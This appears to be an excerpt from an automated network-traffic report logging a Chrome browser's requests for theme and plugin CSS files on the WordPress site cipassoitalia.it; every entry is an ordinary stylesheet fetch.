    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/hr/hr.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icon/icon.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconbox/iconbox.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icongrid/icongrid.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconlist/iconlist.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image/image.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image_hotspots/image_hotspots.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/magazine/magazine.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/masonry_entries/masonry_entries.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/css/avia-snippet-site-preloader.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/menu/menu.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/notification/notification.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/numbers/numbers.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfolio/portfolio.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/progressbar/progressbar.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/promobox/promobox.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/search/search.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_accordion/slideshow_accordion.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_feature_image/slideshow_feature_image.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_fullsize/slideshow_fullsize.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_fullscreen/slideshow_fullscreen.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_layerslider/slideshow_layerslider.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/social_share/social_share.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tab_section/tab_section.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/table/table.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tabs/tabs.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/team/team.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/testimonials/testimonials.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/timeline/timeline.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/toggles/toggles.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/video/video.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=6.6.1 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cookie-law-info/legacy/public/css/cookie-law-info-public.css?ver=3.0.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cookie-law-info/legacy/public/css/cookie-law-info-gdpr.css?ver=3.0.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/plugins/sitepress-multilingual-cms/templates/language-switchers/legacy-list-horizontal/style.css?ver=1 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-wpml/wpml-mod.css?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/css/shortcodes.css?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/js/aviapopup/magnific-popup.css?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/css/avia-snippet-lightbox.css?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/css/avia-snippet-widget.css?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
